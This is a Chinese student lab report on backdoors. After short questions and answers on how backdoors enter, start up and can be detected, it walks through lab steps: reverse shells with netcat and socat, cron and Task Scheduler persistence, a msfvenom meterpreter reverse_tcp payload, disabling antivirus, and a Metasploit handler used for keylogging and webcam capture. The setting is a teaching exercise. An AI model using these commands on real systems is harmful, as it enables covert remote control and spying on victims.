《网络对抗》 后门原理与实践

《网络对抗》 后门原理与实践

基础问题回答

• 例举你能想到的一个后门进入到你系统中的可能方式？
  答：下载东西的时候，特别是从网盘上下载的时候总是会带着一些无关紧要的东西，那就很有可能是后门软件。还有就是一些免费的软件会自带后门。

• 例举你知道的后门如何启动起来(win及linux)的方式？
  答：与别的应用关联启动；开机自启动或定时启动；广告程序虚假关闭按钮等。

• Meterpreter有哪些给你映像深刻的功能？
  答：键盘抓取和摄像头拍摄功能，突然感觉要是自己的电脑被后门所控制的话自己就完全没有隐私可言了。

• 如何发现自己有系统有没有被安装后门？
  答：检查是否有异常的开机启动项；是否有异常后台进程；是否有异常流量。

实验总结与体会

通过实验我认识到后门的功能之强大已经大大超乎我的想象，当今的软件后门事件频频被曝，其中还不乏大公司大企业的应用，细思恐极！所以说以后盗版软件还是不下为好，免费软件也是能不下就不下，定期进行电脑杀毒。

实验内容

使用netcat获取主机操作Shell，cron启动

• 准备工作
  Windows中并没有netcat，需要到老师的Git中下载，下载到本地后进行解压并将解压后文件夹中所有文件拷贝到C:\Windows\System32文件夹中。

• linux获取windows的shell
  在kali中输入指令nc -l -p 端口号来设置监听；
  在Windows中输入指令ncat.exe -e cmd kali的IP 端口号来将自己的cmd传给kali；
  成果如下图：
  

• cron启动
  在kali终端中使用crontab -e打开配置文件，修改方式与vim一样，按A进入编辑模式，ESC退出编辑，:wq保存退出；
  将文件最后一行老师原有的指令按照m h dom mon dow user command格式进行修改。
  
  这样就使得kali系统内每个小时的第20分钟自动运行指令，反弹至pc端的608端口。

使用socat获取主机操作Shell, 任务计划启动

• 准备工作
  socat同样也得到老师的Git中下载，下载完成后解压即可使用。

• 使用socat获取主机操作Shell
  在Windows中开启监听程序，socat tcp-listen:端口号 exec:cmd,pty,stderr；
  在Kali中连接Windows的监听程序，获取shell，socat - tcp:主机IP:端口号；
  

• 任务计划启动
  控制面板→系统和安全→管理工具→任务计划程序→创建任务；
  在创建任务—操作选项卡中新建任务操作；
  在触发器选项卡中选择新建…，可以设置任务频率以及开始时间。我设置的是“一次”，时间是在1分钟之后；
  等待1分钟，自动弹出窗口；

使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

• 生成后门程序
  在kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=虚拟机IP LPORT=端口号 -f exe >20145224.exe来生成后门程序；
  

• ncat传输后门文件
  文件传输前务必将杀毒软件关闭！
  windows系统使用ncat.exe -lv 端口号 > 保存文件名监听准备接受文件；
  kali系统使用ncat -nv 主机IP 端口号 < 文件名来发送指定文件；

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

• 开启msf进行设置
  在kali中使用msfconsole开启msf；
  接着依次输入：

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 主机IP
set LPORT 端口号
show options（检查所有数据是否正确）
exploit

这时候监听已经开始了，在windows中运行之前的后门程序可以成功控制远程shell；

• meterpreter信息搜集
  
  详细指令见老师的Git；
  我的win10无法调用摄像头，无法导出密码文件SAM，也无法提权；